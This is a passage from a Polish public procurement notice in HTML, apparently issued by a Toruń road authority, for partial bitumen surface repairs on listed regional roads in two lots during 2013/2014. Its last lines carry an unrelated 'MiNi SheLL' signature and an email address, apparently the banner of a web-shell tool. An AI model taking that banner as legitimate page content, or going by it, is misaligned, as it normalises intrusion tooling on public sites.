4. 	Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw-bydgoszcz.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonie Dróg Wojewódzkich w Toruniu, ul. Polna 113; 87-100 Toruń..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 09:45, miejsce: Rejonie Dróg Wojewódzkich w Toruniu, ul. Polna 113; 87-100 Toruń..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW- Toruń w 2013/2014r dla części nr - 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w części I objęto drogi wojewódzkie:
1. Nr - 250 - Suchatówka - Służewo			     w km 0+000 - 13+631 = 13,631 km
2. Nr - 546 - Zławieś Wielka - Łubianka 		     w km 0+000 - 13+123 = 13,123 km
3. Nr - 553 - Toruń - Łubianka - Wybcz		     w km 6+142 - 21+871 = 15,729 km
4. Nr - 597 - Rzęczkowo -Cichoradz-Unisław	     w km 0+000 - 10+242 = 10,242 km
5. Nr - 245 - Gruczno-Głogówko /do dr nr 1/             w km12+422 - 15+042 =  2,620 km
6. Nr - 248 - Zbrachlin-Borówno			     w km 4+581 -   5+381 =  0,800 km
7. Nr - 249 - Czarnowo - rz. Wisła -Solec Kuj	     w km 0+000 -   1+983 =  1,983 km
8. Nr - 549 - Fordon- rz. Wisła -Strzyżawa		     w km 0+000 -   1+344 =  1,344 km
9. Nr - 550 - Chełmno- Kokocko-Unisław	               w km 0+000 - 25+263 = 25,263 km
10. Nr - 551 - odc. Strzyżawa- Chełmża	               w km 0+000 - 32+000 = 32,000 km       
11. Nr - 291 - St. kolej. Otłoczyn - do dr nr 1	     w km 0+000 -   2+187 =  2,187 km
12. Nr - 273 - Cierpice - Nieszawka		               w km 0+000 -   7+120 =  7,120 km
                                                                                                                  ---------------
                                                             Łącznie długość dróg -    126,042 km
Zamówienie obejmuje następujący zakres robót dla części I :
3.1. 	Zadanie nr 1: Remont cząstkowy nawierzchni bitumicznych grysami 
         i emulsją asfaltową:
- remont spękań siatkowych nawierzchni, rakowiny,
- remont cząstkowy nawierzchni, głębokość wyboju do 3 cm,
- remont cząstkowy nawierzchni, głębokość wyboju do 4 cm,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.2 	Zadanie nr 2: Remont cząstkowy nawierzchni bitumicznych przy użyciu mieszanki mineralno - asfaltowej:
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno - asfaltową                    z otaczarki,
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową: mechaniczne      rozłożenie i zagęszczenie,
- ułożenie nawierzchni z mieszanki mineralno-asfaltowej - grubość warstwy 4 cm - nakładki,
        - regulacja pionowa kratek ściekowych i włazów kanałowych,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.3. 	Zadanie nr 3: Likwidacja przełomów: 
- mechaniczna rozbiórka nawierzchni i podbudowy,
- mechaniczne wykonanie koryta, 
- wykonanie warstwy odsączającej z piasku,
- wykonanie podbudowy z tłucznia kamiennego:
  warstwa dolna 15 cm,
  warstwa górna 10 cm,
- ułożenie warstwy wiążącej z MMA 0/16 mm, 
- ułożenie warstwy ścieralnej z MMA 0/12,6 mm, 
- wykonanie lub pogłębienie rowu przydrożnego, 
- wykonanie oznakowania poziomego cienkowarstwowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW- Toruń w 2013/2014r. dla części nr- 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w części II objęto drogi wojewódzkie: 

13. Nr - 657 - Złotoria- Lubicz Górny 	                    w km 0+000 - 7+735 = 7,735 km
14. Nr - 654 - Silno- Grabówiec- Złotoria		          w km 0+000 - 6+479 = 6,479 km
15. Nr - 646 - Turzno - Brzeźno			          w km 0+000 - 2+783 = 2,783 km
16. Nr - 589 - Grzywna - Chełmża			          w km 0+000 - 4+226 = 4,226 km
17. Nr - 582 - St. kolej. Ostaszewo - do dr 499               w km 0+000 - 1+614 = 1,614 km
18. Nr - 572 - St. kolej. Lubicz - do dr nr 10 	          w km 0+000 - 0+343 = 0,343 km
19. Nr - 552 - Różankowo - Łysomice - Lubicz	       w km 0+000 - 17+371 = 17,371 km
20. Nr - 499 - Ostaszewo (dr 1)-Sławkowo - Mirakowo    w km 0+000 - 7+421  = 7,421 km
21. Nr -258 -(dr nr 1)Brzoza- rz. Wisła -Silno -Obrowo w km 0+000 - 15+266 = 15,266 km
22. Nr - 551 - odc. Chełmża-Orzechowo	                w km 32+000 - 50+046 = 18,046 km
23. Nr - 599- Mirakowo-Grodno             	                    w km  0+000 - 1+385 = 1,385 km
24. Nr - 554 - Orzechowo-Kowalewo Pom.- Kikół	        w km 0+000 - 44+389 = 44,389 km
25. Nr - 649 - Pluskowęsy- Mlewo-Sierakowo	        w km 0+000 - 14+918 = 14,918 km
26. Nr - 556 - Ostrowite- Brzuze-Zbójno	                  w km 0+000 - 12+759 = 12,759 km
27. Nr - 566 - St. kolej. Czernikowo-do dr nr 10	           w km 0+000 - 0+334 = 0,334 km
28. Nr - 569 - Golub Dobrzyń-Dobrzejewic                   w km 0+000 - 21+293 = 21,293 km
                                                                                                               ----------------
                                                                           Łącznie długość dróg - 176,362 km

Zamówienie obejmuje następujący zakres robót  dla części II:
3.1. 	Zadanie nr 1: Remont cząstkowy nawierzchni bitumicznych grysami 
         i emulsją asfaltową:
- remont spękań siatkowych nawierzchni, rakowiny,
- remont cząstkowy nawierzchni, głębokość wyboju do 3 cm,
- remont cząstkowy nawierzchni, głębokość wyboju do 4 cm,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.2 	Zadanie nr 2: Remont cząstkowy nawierzchni bitumicznych przy użyciu mieszanki mineralno - asfaltowej:
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno - asfaltową                    z otaczarki,
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową: mechaniczne      rozłożenie i zagęszczenie,
- ułożenie nawierzchni z mieszanki mineralno-asfaltowej - grubość warstwy 4 cm - nakładki,
        - regulacja pionowa kratek ściekowych i włazów kanałowych,
- wykonanie oznakowania poziomego cienkowarstwowego.

3.3. 	Zadanie nr 3: Likwidacja przełomów: 
- mechaniczna rozbiórka nawierzchni i podbudowy,
- mechaniczne wykonanie koryta, 
- wykonanie warstwy odsączającej z piasku,
- wykonanie podbudowy z tłucznia kamiennego:
  warstwa dolna 15 cm,
  warstwa górna 10 cm,
- ułożenie warstwy wiążącej z MMA 0/16 mm, 
- ułożenie warstwy ścieralnej z MMA 0/12,6 mm, 
- wykonanie lub pogłębienie rowu przydrożnego, 
- wykonanie oznakowania poziomego cienkowarstwowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com